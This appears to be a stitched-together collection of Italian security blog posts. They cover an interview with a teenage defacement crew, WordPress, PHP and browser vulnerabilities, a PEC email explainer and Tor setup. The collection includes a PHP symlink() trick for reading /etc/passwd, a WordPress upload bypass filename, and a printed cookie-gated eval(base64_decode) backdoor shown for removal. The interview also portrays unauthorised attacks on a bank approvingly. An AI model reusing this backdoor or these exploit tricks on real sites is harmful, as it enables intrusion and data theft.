Come immagine ho scelto la locandina del famoso film Hackers del 1995 che vede come protagonisti una crew di giovani ragazzi che un po’ per divertimento un po’ per passione portarono a termine attacchi di grande portata scombussolando una città e finendo nel mirino dell’Fbi. Il film, come si sa, è finzione, ma è stato di ispirazione per molti ragazzini che come me sognavano di diventare hacker o qualcosa del genere.

Il motto del film era:

their only crime was curiosity

(il loro unico crimine era la curiosità)

Conoscendo un po’ meglio i ragazzi del pr0_alpha_team mi è tornato alla mente e vediamo perché.

D #1: – Come nasce il pr0_alpha_team? E’ stata più una cosa tra amici tipo “vediamo fin dove riusciamo ad arrivare” o strutturata e organizzata?

L’Alpha_Team nasce come un gruppo di ragazzi (amici virtuali) , che sfida le infrastrutture che al giorno d’oggi dovrebbero essere le più sicure, cercando di far notare ai cari Italiani quanto siano vulnerabili i loro sistemi e come dati privati possano finire nelle mani di gente qualunque.

D #2 - Il nome pr0_alpha_team da dove proviene? Siete una versione “alpha” quindi ancora non ufficiale? cosa dobbiamo aspettarci?

Allora il nome Alpha_Team deriva dalla poca fantasia che avevamo quando ci siamo registrati su Zone-H, cosa dovreste aspettarvi? beh spero per noi che potremmo ancora divertirci nel cercare vulnerabilità

D #3 -  Guardando il vostro profilo su Zone-H si ha notizia di voi a partire da Novembre. Siete una crew “emergente” o operate da tempo ma solo ora volete rendere note le vostre azioni?

In precedenza abbiamo operato come singoli , ma poi un giorno abbiamo deciso di unirci e diventare l’Alpha_Team e rendere note le nostre azioni.

D #4 – Il vostro background? Siete “ethical hacker” anche come lavoro?

Siamo tutti studenti delle superiori ma in futuro vorremo sicuramente lavorare in quel campo, non ci definiamo hacker, ma solo appassionati informatici.

D #5 – Indipendenti o parte di un progetto più grande?

Siamo un gruppetto indipendente.

D #6 – Perché siti istituzionali? Quale messaggio volete mandare?

Attacchiamo siti importanti sia per divertimento sia per far capire ai nostri cari webmaster come sia facile sfruttare le loro mancanze. Per esempio nell’attacco alla Banca delle Marche volevamo far capire ai webmaster come sia stato facile per noi reperire informazioni sensibili.

D #7 – Fino ad ora le vittime illustri sono state violate con attacchi Sql Injection. E’ la tecnica che preferite o è quella a cui, come si è visto, erano vulnerabili tutte le vittime?

Perché in quei siti abbiamo trovato quel tipo di vulnerabilità.

D #8 – Il silenzio della stampa. I giornali latitano sempre quando l’attacco non è firmato Anonymous che “fa audience”. Cosa ne pensate di questa dis-informazione?

Pensiamo che al giorno d’oggi non ci sia dis-informazione ma solo poca voglia di reperire informazioni da utenti che utilizzano internet. Tutti dovrebbero sapere che rischi corrono navigando su internet.

D #9 – Il termine hacker ancora oggi viene usato in maniera errata e non si fanno mai distinzioni tra ethical, white hat, black hat, etc.. Voi come vi definite?

Siamo solo ragazzi appassionati di informatica.

D #10 – Il sito di una Banca, il sito dello store della Difesa… le vostre azioni hanno messo ancora una volta in rilievo le carenze tecniche in merito alla sicurezza informatica. In Italia spendere soldi per prevenire appare ancora una “cattiva abitudine” (purtroppo). Le vostre vittime se informate della violazione come han reagito? Le falle poi vengono sistemate?

Reagirebbero malissimo. Come possiamo vedere nel sistema bancario delle Marche ci troviamo di fronte ad un C.M.S. a pagamento, e credo che non lo abbiano pagato poco. No, le falle ad oggi sono come prima.

Concludendo questa intervista ne emerge ancora una volta la scarsa attenzione dedicata alla sicurezza informatica, dei nostri dati e delle infrastrutture che il nostro Paese presta ai suoi servizi più importanti o critici. Questi ragazzi, come ho premesso citando il film “Hackers“, sono solo appassionati e curiosi. I mezzi e le competenze li hanno e stanno dimostrando come uniti si possono raggiungere obiettivi importanti come il sito di una Banca o dell’Esercito. Non sono legati a nessun gruppo “famoso” e pertanto del pr0_alpha_team sono in pochi a parlare ma, come loro stessi hanno affermato, vogliono rendere note le loro azioni.

Sul tema della disinformazione fanno un’osservazione corretta dicendo che ai giorni d’oggi con internet a disposizione di chiunque è difficile pensare che la gente sia male o per niente informata. Almeno i giornalisti pagati per “informare” potrebbero provare a fare quello sforzo in più che noi non sempre abbiamo tempo o modo di fare.

Riguardo infine l’attacco al sito della Banca delle Marche (bancadellemarche.it) ci fanno sapere che nonostante i soldi spesi per un CMS risultato vulnerabile (può capitare eh, nessuno mette in dubbio che ci possano essere bug) non è stata ancora sistemata la falla. Sono queste le notizie che tra le tutte dovrebbero far riflettere. Possibile che una Banca dopo aver riscontrato delle violazioni nei propri dati non ne faccia notizia e neanche rimedia in tempi brevi?

Errare è umano, ma perseverare è diabolico..

La sigla GCHQ non ci ricorda molto ma nelle ultime ore ogni blog o sito addetto ai lavori ne parla e ne ride.

Il GCHQ altro non è che il Government Communications Headquarters, ossia l’agenzia inglese per lo spionaggio delle comunicazioni che lavora a stretto contatto con i Servizi Segreti MI5 e MI6 per proteggere, monitorare e intervenire per la sicurezza dell’Inghilterra e dei suoi cittadini, in primis la Regina!

Dal nome e da questa breve descrizione ci si aspetta un team dei migliori hackers inglesi che giorno e notte veglia sulla vecchia Inghilterra per evitare che qualcuno decida di attaccarla o creargli problemi. Per fare ciò hanno bisogno di nuovi analisti e perciò, in gran segreto, hanno deciso di indire un concorso dal nome “Can you crack it?” dove solo chi riesce a risolvere l’enigma può avere accesso all’area dove si lasciano i propri dati e ci si candida per l’offerta di lavoro.

Il “concorso” è a tempo, dura 10 giorni (nel momento in cui scrivo mancano ancora 8 giorni e 16 ore) e consiste nel decriptare un codice partendo da una tabella di coppie di valori esadecimali.

Questa l’home page del sito:

Il motivo per cui tale notizia continua a far scalpore è dovuto al fatto che con una semplice ricerca su Google è stato possibile bypassare la pagina iniziale ed arrivare direttamente a quella dove lasci i dati per candidarti all’offerta di lavoro.

Per trovarla è bastato eseguire la più semplice delle ricerche di Google:

inurl:canyoucrackit.co.uk

e tra i primi risultati si ottiene l’url:

http://www.canyoucrackit.co.uk/soyoudidit.asp

che porta direttamente alla pagina di congratulazioni.

Una svista non da poco per chi dovrebbe difendere la Regina!

Dopo la scoperta la pagina è stata tolta dall’indicizzazione di Google ma ormai la notizia era arrivata alle orecchie di tutti.

Per chi volesse mettere alla prova le sue abilità cercando in Internet potrà trovare molte informazioni su come effettuare il decrypt corretto dell’esercizio

Qui trovate la soluzione, invece!

Le principali novità e fix riguardano:

• Migliorie di sicurezza e delle query di tassonomia
• Fix di sicurezza del redirect canonical redirects
• Fix di sicurezza media
• Aggiunta prevenzione da azioni malevole tramite file host
• Pulizia del vecchio file di importazione di WordPress se l’importazione non giunge a termine.
• Aggiunta protezione “clickjacking”

Provvedere quanto prima ad aggiornare il vostro WordPress dall’Area Admin o scaricandolo da qui.

FONTE: http://www.wordpress-it.it/2011/05/25/wordpress-3-1-3-in-inglese/

La vulnerabilità è particolarmente grave perchè colpisce piú del 99% dei device attivi, ne risultano immuni infatti solo le versioni Gingerbread 2.3.4 e Honeycomb 3.0 e 3.1.
Per fortuna, in attesa di ricevere il fix nei prossimi giorni gli utenti potranno comunque proteggersi mettendo in pratica alcuni accorgimenti.
Il problema di sicurezza si verifica solo se un utente si collega ad una rete wifi libera, quindi chiunque si connetta abitualmente ad hotspot o lo abbia fatto di recente farebbe meglio a disattivare l’opzione di connessione automatica alle reti wifi ed eliminando il consenso a quelle utilizzate di recente, nel caso la rete free fosse di proprietà il consiglio é ovviamente quello di impostare una protezione, ma questo é una buona norma sempre, non solo in casi di vulnerabilità come quella di cui stiamo parlando in questo articolo.
Allo stato attuale, in attesa della patch di Google, il rischio che si corre é quello che un utente non autorizzato possa accedere ai nostri dati contenuti nel calendario e nei contatti di Android perché lo scambio di autorizzazione tra il client e server non avviene tramite protocollo https (Hyper Text Transfer Protocol Secure), ma tramite semplice http.
Tuttavia Google sta valutando anche la connessione alle librerie di Picasa che sembrerebbero anch’esse affette dalla stessa vulnerabilità, un motivo in piú per diffidare delle reti aperte fino a che non sarà cessato del tutto questo giustificato allarme.

Read the original:
Microsoft, patch day da record

Source: Webnews

Andiamo per ordine, circa una settimana fa il colosso di MountView comunica l’individuazione di violazioni nella loro infrastruttura informatica mirati verso alcuni indirizzi email. In un primo momento hanno pensato che si trattasse di “normale amministrazione”, in fin dei conti una grande azienda come Google di violazioni o tentativi ne riceve quotidianamente. Indagando accuratamente, però, è emerso che il mittente di questi attacchi fosse il Governo Cinese e le vittime, invece, fossero alcuni esponenti per i diritti umani oltre ad una ventina di grandi aziende di vari settori: finanziario, chimico, comunicazione, etc.porpo

Constatando la gravità dell’accaduto hanno chiesto spiegazioni alla Cina che però fa orecchie da mercante e proprio negli ultimi giorni ha risposto sostenendo di non avere nulla a che fare con questi cyberattacchi. Google, calcolando che nel 2006 quando aprì in Cina dovette compiacere il Governo Cinese applicando la censura al suo Motore di Ricerca, non ha gradito questa risposta e in nome dei diritti umanitari e della democrazia ha ribattuto minacciando di chiudere i battenti in quella nazione. Nell’annuncio ufficiale dal loro Blog chiariscono che la decisione (che sembrebbe essere già stata presa) non è stata decisa né ancora comunicata ai dipendenti di Google.cn. Questo uno stralcio della comunicazione:

La decisione di riconsiderare la nostra attività in Cina è stata incredibilmente difficile e sappiamo che potrebbe avere conseguenze molto serie. Teniamo a specificare che la decisione è stata presa dalla dirigenza di Google negli Stati Uniti, senza che i nostri dipendenti in Cina ne fossero a conoscenza o fossero coinvolti nella decisione. A loro va il nostro riconoscimento per aver lavorato con grande dedizione al successo di Google.cn

In alternativa alla chiusura proporranno/chiederanno alla Cina di poter impostare il loro Motore di Ricerca come nel resto del mondo quindi libero da censure di ogni sorta. Nel frattempo si sono movimentati gruppi e tra i nomi attivi in questa campagna a favore della libertà di Internet per la Cina abbiamo Hilary Clinton che dal Museo dell’Informazione di Washington ha lanciato la nuova politica estera basata sulla libertà di internet. Anche Obama ha espresso la sua preoccupazione circa questa situazione e, come riportato dal suo portavoce:

Il presidente «continua ad essere turbato dalla falla nella cyber sicurezza che Google attribuisce alla Cina… Stiamo aspettando delle risposte dalla Cina». Burton ha aggiunto che Obama ritiene che i responsabili dovrebbero «affrontare le conseguenze» dei loro atti.

Nell’attesa di ulteriori sviluppi su questa vicenda negli stessi giorni se ne è sviluppata una seconda. Infatti alcuni esperti di sicurezza analizzando le violazioni subite da Google hanno comunicato che tali attacchi sono stati possibili a causa di una grave vulnerabilità presente in alcune versioni di Internet Explorer.

Secondo l’Ufficio Federale responsabile per la sicurezza informatica Tedesco (BSI) la vulnerabilità affligge tutte le versioni di Internet Explorer dalla 6 alla più recente 8 presente negli ultimi Windows Vista e Windows Seven. Microsoft Italia risponde sottolineando che la falla è grave solo nella versione Internet Explorer 6 con piattaforma Windows Xp mentre in tutti i nuovi sistemi operativi e browser, grazie alle funzionalità di sicurezza che sono state implementate, il problema risulta di gravità inferiore.

Internet Explorer – Feliciano Intini e Luca Colombo from MClips on Vimeo.

Tale problematica ha portato ad alcune eclatanti affermazioni come lo stesso BSI che ha invitato gli utenti tedeschi a non utilizzare Internet Explorer ed utilizzare browser alternativi a cui ha fatto eco la Francia con il CERTA che invitava gli utenti degli Enti pubblici e non utilizzare questo browser.

Nonostante quanto detto comprendendo l’agitazione tra i suoi utenti Microsoft ha fatto uscire una patch straordinaria dove risolve il problema indicato sottolineando ancora una volta che gli utenti delle più recenti versioni del Browser non devono (e non dovevano) preoccuparsi poiché le funzionalità di Data Execution Prevention e di Protected Mode rendevano il rischio inesistente.

Da notare come nell’ultime Microsoft Security Bulletin di Gennaio ci sia citata Google tra i ringraziamenti ed in particolare Tavis Ormandy, scopritore della falla che recentemente ha segnalato una vulnerabilità di code injection in tutti i Sistemi Microsoft 32 bit dal 1993 ad oggi. In questo articolo potete leggere nel dettaglio la falla da lui individuata.

Speriamo che da queste vicende sempre più utenti si avvicinino e comprendano i pericoli della sicurezza informatica provvedendo a proteggere i propri Pc mantenendoli costantemente aggiornati e controllati.

Di fatto questa vulnerabilità da la possibilità di leggere aree/file del WebServer non autorizzate quali il file “/etc/passwd” e similari.

L’applicazione pratica e più semplice di tale vulnerabilità è il seguente codice:

< ?php
 symlink("/etc/passwd", "prova.txt");
 ?>

Se il “safe_mode” del Php era disabilitato nel proprio spazio sarebbe stato creato un link simbolico dal nome “prova.txt” che puntava al contenuto di “/etc/passwd”. In questo modo richiamando dal browser il link simbolico nel seguente modo:

http://<dominio>/prova.txt

avremmo visualizzato a video il contenuto del file “/etc/passwd”. A seconda dell’Hosting questo file può contenere anche le password dell’account web del Cliente e pertanto la gravità della vulnerabilità è elevata.

Nel caso, invece, il safe_mode del Php fosse stato attivo sarebbe stato visualizzato un messaggio di errore che indicava l’impossibilità di eseguire l’operazione a causa della mancanza dei permessi di accesso al file “/etc/passwd”.

Ho provato ad applicare questa tecnica su diversi Hosting dove ho sitarelli o spazi per fare dei test e in base ad alcune configurazioni di sicurezza (privilegi, followsymlink,etc.) si poteva o meno accedere a dati sensibili come, per esempio, visualizzare i file di configurazione di altri domini presenti sullo stesso server dove siamo noi.

Questa vulnerabilità del Php ha fatto nascere alcune discussioni legate ai vari attacchi di massa che si sono verificati lo scorso anno su vari Hosting condivisi noti e meno noti. Dal mio punto di vista è plausibile pensare, quindi, che questa falla abbia dato la possibilità di accedere e violare centinaia di spazi Web rubando informazioni preziose per eventuali ulteriori attacchi.

Link correlati:

Exploit

PHP 5.2.12/5.3.1 symlink() open_basedir bypass – SecurityReason.com

Symlink Attack – HTML.it

La notizia non era molto dettagliata poiché la vulnerabilità era stata annunciata molto genericamente come una vulnerabilità che permetteva di “aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache”. Ora che è stata patchata, come spesso accade, iniziano a trovarsi maggiori informazioni e Proof of Concept.

In realtà la vulnerabilità permette di uploadare file bypassando il controllo della tipologia di file e permettendo, quindi, di uploadare script php e similari che possono poi essere richiamati da colui che attacca. Affligge tutte le versioni inferiori alla 2.8.5 (compresa) perciò provvedete quanto prima ad aggiornare il vostro blog.

La notizia era stata pubblicata l’11 Novembre scorso nella nota Mailing List Full Disclosure dove Dawid Golunski ha pubblicato un Proof Of Concept che potete leggere a questo link. Praticamente spiega che la verifica del file uploadato avviene confrontando l’estensione del file, estrapolata tramite una Regular Expression, con un array dei Mime Type permessi.

La Regular Expression, però, unita al fatto che i WebServer Apache (solamente in una particolare configurazione spiegata qui) consentono di creare file nel formato

filename.ext1.ext2

può essere bypassata uploadando un file contenente codice Php e assegnandogli un nome come il seguente:

phpinfo.php.jpg

In questo modo la verifica del file applicata da WordPress estrapolerebbe tramite la RegEx l’estensione “.jpg” e successivamente, verificandola con l’Array dei Mime Types ammessi, permetterebbe al file di essere uploadato scambiandolo per un’immagine.

Una volta fatto ciò chi attacca potrà richiamare lo script digitando la path standard dei file uploadati di WordPress ossia:

http:///wp-content/uploads/2009//phpinfo.php.jpg

Questa vulnerabilità, sebbene grave, non dovrebbe causare gravi danni visto che chi attaca deve essere un membro dello staff con privilegi di pubblicazione come era stato annunciato in occasione della 2.8.6.

Resta invece ancora sconosciuta la vulnerabilità di Cross Site Scripting scoperta da Benjamin Flesch sempre nella versione 2.8.5 di WordPress.

Eccovi alcuni link correlati:

Proof Of Concepts – WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution by Dawid Golunski

Vupen – WordPress Arbitrary File Upload and Cross Site Scripting Vulnerabilities

SecurityFocus – WordPress Unspecified Cross Site Scripting Vulnerability

La prima è una vulnerabilità del componente “Press This” (Pubblicalo in italiano) scoperta da Benjamin Flesch che permetteva di eseguire XSS (Cross Site Scripting) agli utenti registrati con privilegi di pubblicazione.

La seconda, invece, è stata scoperta da Dawid Golunski e consentiva di aggirare le limitazioni ai nomi dei file in determinate configurazioni Apache.

In attesa della versione WordPress 2.9 consiglio a tutti di provvedere ad aggiornare la propria versione tramite la funzione di “Aggiornamento Automatico” che verrà suggerita non appena entrerete nella vostra Bacheca.

Per Social Engineering si intende lo studio dei comportamenti di una persona (vittima) al fine di individuare il miglior metodo per farsi comunicare l’informazione riservata di cui si ha bisogno.

Nel libro Mitnick elenca molti esempi di metodi che han consentito (e consentono) di far leva nelle persone al fine di farsi comunicare password o informazioni preziose per poter poi accedere ed effettuare attacchi verso un dato sistema informatico. Si va dal fingersi un collega al fine di far abbassare la “diffidenza” nella vittima a vere e proprie tecniche di manipolazione che possono portare a far eseguire l’attacco alla vittima stessa. Ovviamente senza che quest’ultima dubiti minimamente del suo interlocutore (colui che attacca).

Copertina "L'arte dell'inganno"

Per ogni capitolo vengono citati diversi esempi e poi analizzati sotto più punti di vista. Da una parte viene spiegato come è stato possibile l’attacco, su quali “tasti” ha agito e, soprattutto, quale falla lo ha consentito. Dall’altra, invece, viene analizzato il sistema “vittima” per portarne alla luce i problemi e le possibili soluzioni.

Il fine del libro è quello di mettere in risalto le vulnerabilità di qualsiasi sistema quando vi è un fattore ben preciso, quello “umano“.

Riassumere in un post tutte le nozioni che si apprendono è quasi impossibile e, quindi, vi invito a leggerlo e, soprattutto, a farlo leggere ai vostri Amministratori di Rete&Co. che potrebbero trovare spunti per fixare problemi di Sicurezza che neanche pensavano di avere.

Ho intrapreso ora la lettura del libro successivo dal titolo “L’arte dell’intrusione” e, non appena finito, provvederò a farne una breve recensione.

Per chi non volesse spendere soldi eccovi di seguito i link a Google Libri per leggerli direttamente on line:

L’arte dell’inganno – K. Mitnick

L’arte dell’intrusione – K. Mitnick

Buona lettura

I plugins di cui parlerò sono i seguenti:

• Web Developer Bar
• Xss Me
• Sql Inject Me
• HackBar
• Tamper Data

Questi 5 plugin torneranno molto utili quando proveremo ad effettuare le nostre prime analisi di sicurezza in quanto permettono di analizzare diversi aspetti di un sito web. Va detto che non sono programmi  “per bucare” ma semplicemente dei test i cui risultati, se si hanno le giuste conoscenze, possono aiutare ad individuare falle o vulnerabilità in un dato sito.

• Professionisti iscritti in albi ed elenchi istituiti con legge dello stato che dovranno gestire le comunicazioni con la Camera di Commercio ed enti pubblici attraverso la posta elettronica certificata. Tale strumento inoltre potrà essere utilizzato anche in alternativa alla vecchia raccomandata postale, ottimizzando così tempi, evitando code agli sportelli;
• Aziende che dovranno dotarsi di un indirizzo di posta certificata da indicare già al momento della domanda di inscrizione al registro delle imprese. La posta elettronica certificata potrà essere utilizzata in sostituzione della posta cartacea, ottimizzando le comunicazioni formali con clienti, partner e fornitori;
• Enti della Pubblica Amministrazione che desiderano inviare comunicazioni ufficiali verso le altre PA oppure verso i cittadini, con conseguente risparmio in termini di tempi e costi.

Anche i Privati, se vogliono, possono acquistare tale Servizio e sinceramente mi auguro che in futuro sarà necessaria per ogni cittadino italiano.

Di cosa si tratta?

La Posta Certificata a livello di utilizzo non differisce da una normale casella di posta ma fondalmente ha 2 vantaggi:

1. le comunicazioni effettuate hanno valore legale (DPR n.68 dell’11/2/2005) e le consegne sono certificate. E’ facile intuire, quindi, che può sostituire le “famose” Raccomandate A/R che attualmente sembrano essere l’unico mezzo per rendere “ufficiale/legale” una comunicazione via posta (Certificati Medici all’INPS e al Dataore di Lavoro, Invio di Fatture, etc);
2. permette di inviare/ricevere con un elevato livello di sicurezza e con dei livelli di servizio garantiti un documento informatico dato che le comunicazioni possono avvenire solo tra caselle PEC eliminando, quindi, il fastidioso problema dello spam.

Certificata

Come detto in precedenza tutte le comunicazioni effettuate tramite tale casella PEC sono certificate poiché il gestore del Servizio (che dovrà essere registrato presso il CNIPA -Centro Nazionale per Informatica nella Pubblica Amministrazione) è tenuto ad comunicare tutte le fasi dall’invio alla ricezione tramite certificati che hanno valore legale. Il possessore di una casella di Posta Certificata, quindi, avrà la garanzia al 100% che il suo messaggio è stato ricevuto dal destinatario ricevendo 3 certificati per ogni cambio di stato che il suo messaggio ha avuto.

I Certificati sono i seguenti:

• di accettazione – che attesta l’avvenuto invio della mail dal gestore di posta elettronica certificata del mittente;
• di presa in carico – che attesta il passaggio di responsabilità tra due distinti gestori di posta certificata, mittente e destinatario. Questa ricevuta viene scambiata tra i due gestori e non viene percepita dagli utilizzatori del servizio;
• di avvenuta consegna – che attesta che il messaggio è giunto a buon fine e che il destinatario ne ha piena disponibilità nella sua casella (anche se non ha ancora visto il messaggio).

Qualora si dovessero ricontrare problemi, invece, si riceverrano 3 certificati:

• di non accettazione – per utilizzo di un mittente falso, utilizzo di destinatari in copia nascosta (vietati dalla PEC) o per problemi di altro genere;
• di mancata consegna – il mittente la riceverà entro 24 ore;
• di rilevazione di virus informatici – per la presenza di virus informatici.

Sicurezza

La sicurezza oltre ad essere garantita dal fatto che le comunicazioni possono avvenire solo tra caselle PEC (quindi sottoposte ai divieti di virus, mittente falso, etc) utilizzano solo ed eslusivamente protocolli di comunicazione sicuri:

• POP3s
• SMTPs
• IMAPs
• HTTPs

Risparmio

Un altro grosso vantaggio dell’avere una casella PEC è il risparmio sia economico che in termini di tempo.

Dal punto di vista economico le soluzioni offerte dalle varie aziende del settore risultano essere vantaggiose in quanto il costo parte dai circa 5 € ai 20 € o più annui. La differenza di prezzo, va detto, è dettata praticamente dalla quantità di spazio della casella che solitamente è di 1 GB. Se facciamo dei conti pensando che una Raccomandata A/R costa 3,70€ è facile capire quanto risparmio ci sia.

In termini di tempo, invece, il vantaggio è dettato da tutto il tempo che solitamente si perde in lunghissime file negli Uffici Postali.

Facendo un esempio personale immagino la situazione in cui sono ammalato e giustamente, in qualità di dipendente, devo fare le comunicazioni “di default”.Dopo la visita dal medico mi ritrovo in mano questi 2 certificati che vanno consegnati entro 24 ore al Datore di Lavoro e all’INPS. Per prima cosa me ne torno a casa e, evitando di fare errori, compilo i due certificati. Imbusto e compilo il cedolino della Raccomandata (fa sempre comodo averne alcuni a casa).Poi scendo dal tabaccaio a comprare una busta (20 €cent) e infine vado alle Poste, prendo il numerino e mi siedo. Dopo un’attesa variabile (10-20 min. minimo) vado alla cassa e felice di avere già tutto pronto pago i 3,70 € e invio la raccomandata a lavoro. Poi con l’altro certificato vado all’INPS e registro il certificato con il loro “macchinino automatico”. Alla fine di tutto ciò torno a casa e mi dedico alle cure (si, perché non dimentichiamoci che in tutto questo racconto io ero malato)…

Nella versione Posta Certifica sarebbe così:

• torno a casa
• compilo i certificati
• scansiono i certificati
• mando l’email certificata
• mi curo

Tempo impiegato? 20 minuti in casa mia davanti al Pc.

Spesa? mmm… zero?

Conclusioni

Riassumendo la Posta Certificata (PEC) è uno strumento che potrebbe rivoluzionare il nostro vivere quotidiano dato che, essendo obbligatoria, abbatterà i tempi di comunicazione tra cittadini, Aziende e la Pubblica Amministrazione. La conseguenza -  spero-  sarà uno Stato che risparmierà dei soldi (lettere,raccomandate,carta,etc) da una parte e guadagnerà del tempo – speriamo lo usino bene – dall’altra.

Noi cittadini perderemo  sempre meno tempo in attese varie (Posta,Inps,etc) e risparmieremo quella piccola somma che ogni anno se ne va per inviare documenti ufficiali, la carta, le buste, i francobolli etc.

Se pensiamo che la si può provare spendedo 5€ per un anno direi che potrebbe essere davvero un piccolo punto di svolta per questa “vecchia Italia”

FONTI

• Wikipedia
• CNIPA – Centro Nazionale per l’Informatica nela Pubblica Amministrazione
• La Posta Elettronica Certificata – Documento Ufficiale del CNIPA

Problema

I problemi che si riscontrano utilizzando detto componente in Hosting che hanno abilitato il “Mod_Security” sono principalmentdue due:

1) Mancato accesso all’interfaccia di gestione dal Pannello di Controllo del Joomla;

2) Errore nell’upload dei file tramite l’interfaccia Flash.

Perché?

Entrambe le problematiche nascono dalla presenza in diverse cartelle del file “.htaccess” contenente due istruzioni che, se abilitate nel Server in Hosting, consentono di disabilitare il “Mod_Security” per evitare che blocchi il passaggio di dati/file tra l’interfaccia Flash e il Server.

Il codice di questo file è il seguente:

SecFilterEngine Off
SecFilterScanPOST Off

Sul mio ed altri Hosting tale possibilità è disabilitata in quanto le misure di Sicurezza devono (giustamente) essere sempre attive e, quindi, il file “.htaccess” genera il manifestarsi di errori “500 Internal Server Error” e il mancato funzionamento degli applicativi/componenti dove esso è posizionato.

Al fine di risolvere le due problematiche precedentemente indicate, quindi, è necessario eliminare il file .htaccess dai seguenti percorsi:

/components/com_expose/expose/manager/amfphp
/components/com_expose/expose/manager/upload

Ricercando in rete utilizzando questo numero come chiave di ricerca si troveranno numerosi articoli/post che affermano che si tratta del massimo numero utilizzabile all’interno di un campo BIGINT in Php. Questo porterà l’ignaro utente ad impazzire alla ricerca della funzione all’interno del proprio sito che esegue calcoli che portano alla comparsa di questo numero. Tutto ciò sarà inutile!

In realtà questo numero viene visualizzato poiché le pagine “index.php” del proprio sito sono state hackerate inserendo al loro interno la seguente funzione che non altera il comportamento della pagina ma visualizza a pié di pagina il numero in oggetto.

La pagina modificata apparirà con il seguente codice:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

< ?php
ob_start("security_update"); //do not remove this line - important security update!
 
<--- CODICE ORIGINALE DELLA PAGINA --->
 
?>
                < ?php
                function security_update($buffer)
                {
                        $update = '18446744073709551615';
                        if (stristr($buffer, '</html') !== FALSE)
                        {
                                return eregi_replace('</html', $update.'<html', $buffer);
                        }
                        else
                        {
                                return $buffer.$update;
                        }
                }
                ?>

Come potete vedere analizzando il codice la funzione “security_update” non fa altro che inserire tutto l’output originale della propria pagina in un buffer e successivamente accodare al buffer il valore “18446744073709551615“.

La domanda che sorge è: perché?

Sebbene stia tenendo d’occhio l’evolversi di questo hack non si è ancora individuato il motivo di tale azione. L’ipotesi che al momento appare essere la più veritiera è che venga utilizzato questo codice come “marcatore” dei siti “infetti” così da poterli facilmente trovare in una eventuale ricerca in rete.

In questo modo chi sta effettuando tali hack potrà individuare le proprie vittime e i siti per i quali conosce la falla di sicurezza che ha consentito di scrivere, per ora, il numero “18446744073709551615“.

Vedendo l’andamento delle ultime settimane ho assistito ad un’evoluzione dello script in quanto è stata aggiunta una nuova riga che potrebbe essere realmente dannosa per le vittime. Questo il codice nella sua nuova versione:

1
2
3

< ?php
ob_start("security_update"); //do not remove this line - important security update!
 if(md5($_COOKIE['73043475c0893e30'])=="59fdd20854f4a2056c082cab53e64860"){ eval(base64_decode($_POST['file'])); exit; } ?>< ?php

Questo script ha in più un check su un cookie che, se verificato ($_COOKIE['73043475c0893e30'])==”59fdd20854f4a2056c082cab53e64860″), esegue una decodifica di un file criptato inviato via POST.

In questo modo l’hacker ha la possibilità di inviare file a tutti i domini che precedentemente aveva infettato e “marcato”.

Per ora non ho assistito ad azioni concrete che hanno sfruttato questa funzione “security_update()” ma, ovviamente, è naturale pensare che lo script e le sue evoluzioni siano vari step di un’azione mirata a raccogliere centinaia di siti infetti per effettuare in seguito un attacco di massa.

Come eliminarlo?

Per eliminarlo basta individuare tutte le pagine che mostrano il numero “18446744073709551615” e ripulirle dal codice di questo hack mostrato in precedenza.

Anche in questo caso il programma “PoweGrep” ci torna comodo permettendoci di effettuare una ricerca della stringa “18446744073709551615” su tutti i file del proprio sito (in locale).

Una volta individuate la pagine vanno rimosse queste righe dalla parte superiore della pagina:

1
2
3

< ?php
ob_start("security_update"); //do not remove this line - important security update!
if(md5($_COOKIE['73043475c0893e30'])=="59fdd20854f4a2056c082cab53e64860"){ eval(base64_decode($_POST['file'])); exit; } ?>

(la riga 3 non è presente in tutte le versioni)

e queste rige dalla fine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

                < ?php
                function security_update($buffer)
                {
                        $update = '18446744073709551615';
                        if (stristr($buffer, '</html') !== FALSE)
                        {
                                return eregi_replace('</html', $update.'<html', $buffer);
                        }
                        else
                        {
                                return $buffer.$update;
                        }
                }
                ?>

Possibilità di infezione

Non ho determinato, per ora, se l'infezione avviene tramite una vulnerabilità del proprio applicativo web o se invece avviene via Ftp sfruttando le credenziali del proprio Client Ftp.

In ambo i casi i consigli sono sempre gli stessi e fanno sempre bene:

1) Verificare presso siti di sicurezza come Secunia o SecurityFocus o Milw0rm eventuali nuove vulnerabilità dei propri applicativi/script/cms.

2) Eseguire periodicamente scansioni complete dei propri PC con software AntiMalware,AntiSpyware, etc. In particolare consiglio l'utilizzo di Malwarebytes' Anti-Malware che include tutte queste protezioni in un unica soluzione

Chiunque abbia informazioni al riguardo e volesse condividerle mi scriva all'indirizzo capn3m0@capn3m0.org

AGGIORNAMENTO DELL'8/11/2009: [HACK] – Cannot redeclare security_update(), alla fine è arrivato!

Il programma che vi vado ad illustrare si chiama Tor che unito all’utilizzo di Privoxy consente la navigazione in modalità “anonima” tramite il Browser Firefox.

In che modo riesce a nascondere la nostra identità?

I due applicativi funzionano come un normale Server Proxy ma Tor, in particolar modo, cerca di non passare alcuna informazione “sensibile” ai vari Server che di solito si contattano per raggiungere un punto nella Rete.

Tor distribuisce il percorso delle informazioni viaggianti in rete in maniera tale da fare in modo che nessuno dei nodi di attraversamento contenga tutte le informazioni dei nostri pacchetti e, inoltre, fa anche in modo che il nostro percorso sia quanto più articolato possibile.

Installazione

L’installazione può essere effettuata in due modi. O scaricando i singoli componenti (Tor, Privoxy) e configurandoli manualmente. O, come vi illustrerò, scaricando Vidalia che non è altro che un Gui che permette l’installazione dei due applicativi uniti all’installazione e configurazione di Firefox per poter utilizzare Tor per la navigazione anonima.

Per prima cosa scaricate l’ultimo pacchetto versione “bundle” dal sito di Vidalia.

Vidalia Bundle 0.1.9 per Windows

Una volta scaricato eseguitelo e procedete ad effettuare un’installazione “Full“.

Al termine dell’installazione vi apparire la finestra di Tor come la seguente. Spulciate tra le opzioni e impostatelo come preferite. Io di solito disabilito l’Avvio automatico.

Schermata di avvio di Tor

Fatto ciò avviate Firefox e dovreste vedere una nuova icona in basso a destra come la seguente:

Icona di Tor Button in Mozilla Firefox

Se non dovesse comparire è sempre possibile decidere dove inserirla andando nel Menu di Firefox in:

Visualizza -> Barre degli Strumenti -> Personalizza

Una volta attivo il plugin Tor Button sarà possibile navigare in anonimo sul Web utilizzando Ip diversi dal proprio.

Se volete testarlo vi invito ad andare al seguento sito e aggiornarlo ogni volta che create una “nuova indentità” con Tor:

http://www.showmyip.com/

